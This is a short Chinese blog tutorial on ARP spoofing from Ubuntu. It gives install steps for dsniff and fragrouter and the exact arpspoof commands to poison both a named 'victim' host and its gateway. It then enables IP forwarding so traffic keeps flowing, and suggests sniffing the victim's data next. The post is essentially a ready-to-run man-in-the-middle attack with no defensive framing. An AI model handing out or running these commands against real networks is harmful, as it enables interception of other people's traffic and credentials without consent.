Ubuntu进行ARP欺骗
注意:本文最后更新于 2771 天前,有关的内容可能已经发生变化,请参考使用。
假设系统是ubuntu 9.10,网络情况:路由ip:172.16.86.254 我的电脑ip:172.16.86.2 受害者ip:172.16.86.3
主要用到的工具有2个,一个是Dsniff,还有一个是 fragrouter。
安装Dsniff
sudo apt-get install dsniff
安装 fragrouter
在/etc/apt/sources.list 文件中添加源:
deb http://cz.archive.ubuntu.com/ubuntu hardy main universe
再执行
sudo apt-get install fragrouter
ARP欺骗
欺骗172.16.86.3,告诉172.16.86.3,网关172.16.86.254的MAC地址是本机的MAC地址:
sudo arpspoof -t 172.16.86.3 172.16.86.254
欺骗网关,告诉网关,172.16.86.3的MAC地址是本机的MAC地址:
sudo arpspoof -t 172.16.86.254 172.16.86.3
ARP数据包广播之后,网关和受害机之间的数据交流就都需要经过我的机器了
设置转发,让受害机与网关的通信正常:
$ sudo echo 1 >/proc/sys/net/ipv4/ip_forward
$ fragrouter -B1
接下来就可以嗅探数据咯,还不会用Dsniff的TX去网上搜索一些资料看看,或者转用WireShark的GUI工具抓包……
「倘若有所帮助,不妨酌情赞赏!」
感谢您的支持!
使用微信扫描二维码完成支付